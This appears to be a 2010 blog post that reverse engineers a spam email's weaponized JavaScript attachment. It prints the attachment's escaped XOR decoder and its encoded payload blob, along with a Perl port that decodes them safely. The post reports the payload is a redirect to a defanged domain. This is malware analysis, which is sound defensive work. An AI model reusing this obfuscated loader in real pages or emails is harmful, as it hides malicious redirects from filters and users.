Friday, September 24, 2010

More weaponized javascript email attachments reverse engineered...

My reverse engineering of the latest rash of spam attachment scripts:

 

 

 

use strict; 
use warnings;                                                                                                                                                                         

use URI::Escape;


# The attachment's JavaScript exactly as it arrived: every single
# character is %XX-escaped, which is the first (trivial) layer of
# obfuscation.  The unescaped text is a second-stage decoder, not the
# payload itself (see the comment below).
my $js =  '%66%75%6E%63%74%69%6F%6E%20%65%5F%65%28%65%29%7B%65%3D%75%6E%65%73%63%61%70%65%28%65%29%3B%70%3D%22%54%4F%45%4D%50%4A%5A%4D%4C%4B%50%51%42%4E%42%22%3B%73%3D%22%22%3B%73%6C%3D%6E%65%77%20%41%72%72%61%79%28%29%2C%6B%3D%30%2C%6A%3D%30%3B%66%6F%72%28%69%3D%30%3B%69%3C%65%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%7B%63%3D%65%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%3B%69%66%28%63%3C%31%32%38%29%7B%63%3D%63%5E%70%2E%63%68%61%72%43%6F%64%65%41%74%28%6A%25%70%2E%6C%65%6E%67%74%68%29%3B%6A%2B%2B%3B%7D%73%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%63%29%3B%69%66%28%73%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%73%6C%5B%6B%2B%2B%5D%3D%73%3B%73%3D%22%22%7D%7D%73%3D%73%6C%2E%6A%6F%69%6E%28%22%22%29%2B%73%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%73%29%7D';

# Peel the %XX layer so the decoder function can be read in clear text.
print uri_unescape($js), "\n";

# Decoded, the $js string is a single function named e_e (reformatted
# here; the original is one line):
#
#    function e_e(e){
#        e=unescape(e);
#        p="TOEMPJZMLKPQBNB";
#        s="";sl=new Array(),k=0,j=0;
#        for(i=0;i<e.length;i++){
#            c=e.charCodeAt(i);
#            if(c<128){c=c^p.charCodeAt(j%p.length);j++;}
#            s+=String.fromCharCode(c);
#            if(s.length>80){sl[k++]=s;s=""}
#        }
#        s=sl.join("")+s;
#        document.write(s)
#    }
#
# In other words a second-stage loader: its argument is a %XX-escaped blob
# that is XOR-decoded against the repeating key "TOEMPJZMLKPQBNB" (only
# characters below 128 are XORed, and the key index advances only on those
# characters), and the result is injected straight into the page with
# document.write().  The splitting into 81-character chunks looks like a
# plain obfuscation/perf trick rather than anything cryptographic; note
# that sl.join("")+s puts the completed chunks BEFORE the remainder.

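# Perl port of the attachment's e_e() decoder, so the second stage can be
# recovered without letting a browser execute it.
#
# Mirrors the JavaScript step for step: unescape the argument, XOR every
# character below 128 with the next byte of the repeating key
# "TOEMPJZMLKPQBNB" (the key index advances only on those characters;
# characters >= 128 pass through untouched), collect the output in
# 81-character chunks, and reassemble them as sl.join("")+s -- completed
# chunks first, then the remainder.
#
# Parameters: $string - the escaped ciphertext passed to e_e() in the HTML
#                       (undef is treated as an empty string).
# Returns:    the decoded plaintext.  It is also printed to STDOUT followed
#             by a newline, in place of the original's document.write().
sub e_e {
    my $string = shift;

    # JavaScript unescape(): %XX -> one byte, %uXXXX -> one UTF-16 code
    # unit.  URI::Escape::uri_unescape only handles the %XX form, so the
    # decode is done inline to stay faithful for payloads that use %u.
    my $e = defined $string ? $string : '';
    $e =~ s/%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})/chr( hex( defined $1 ? $1 : $2 ) )/ge;

    my $p   = "TOEMPJZMLKPQBNB";
    my @key = map { ord } split //, $p;

    my $s = "";
    my @sl;
    my $j = 0;    # key position; advances only for chars < 128, as in the JS

    for my $c ( map { ord } split //, $e ) {
        if ( $c < 128 ) {
            $c ^= $key[ $j % @key ];
            $j++;
        }

        $s .= chr($c);

        if ( length($s) > 80 ) {
            push @sl, $s;
            $s = "";
        }
    }

    # s = sl.join("")+s -- completed chunks first, then the tail.  The
    # earlier port did "$s .= join('', @sl)", which put the tail in front
    # of the chunks and so scrambled any payload longer than 81 characters.
    $s = join( '', @sl ) . $s;

    print $s;
    print "\n";

    return $s;
}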

# This is the escaped blob the attachment passes to e_e().  Note that this
# transcript shows several control characters in caret notation (^K, ^H,
# ^D, ^R, ^C, ^[, ^\, ^Y, ^], ^F, ^A) plus long runs of spaces; those are
# presumably how the raw bytes of the original attachment were rendered
# when pasted here, so this literal may not reproduce the original payload
# byte-for-byte -- and the XOR decode is sensitive to every byte.  If you
# rerun this, take the argument from the original attachment, not from
# this page.
e_e('ts%28%28%24%2Bz%258? |%27?7%3D9xo%22%2F%3C?%2988sb%2D%2D%3A%3B #%24wx%7Dw%3E%22%3D%7F&6 ?%7Fb%7F%3E2%28*9?%3C#%27%2C1%3Dk%2E?%27u|b#%24%3C%2Elb%7Bqem%5D@WGp?13%2E%2Bb#&!98wx||%7Busb%2C%2D&%2B ?mhjorw%24#b%2C%257 %29%22%22wxny~fgzv%60t%2E%29%247%24go%2F%2E%3E%25%27%3C%60js1%29nv%3Bm%24957%7Fl* %3B5w%7Fe%2D%3A%3Be %24%2E%221%3B%291c3%257b%24?%3D%3D2!51%3Dk%25%24%27xsp%2D??6n%245%2C pr^K%28%24%2D%27|q%0A%2B%2E%22*1%243%2Bvm?*%3E%22o%3D%27&&#op%295!#9msa^H^D^R                                                        ^C^Krj%29%246%2Emso%7F%60j^[%2D%24#j%0D%28%2Ek0%25%2Bb#%2E6m 859%29%28%244&n %2Do%0D^Y^]^F%0A%22%3B%2E%22%7Dbn^A8&&&p%22??%29k%24%3Eb^\%273&6958fb*                        %24%3E%25|rm5qyb%24%2Edqc?%22o~a65%2D%29%28nGP');

# Decoded, the author reports this yields a <meta> refresh redirecting to
# http://XXXXthefromainerXXXX.com (domain defanged/redacted here; do not
# browse to it).  Decode it with the Perl port above rather than opening
# the attachment in a browser: document.write() would execute the result.
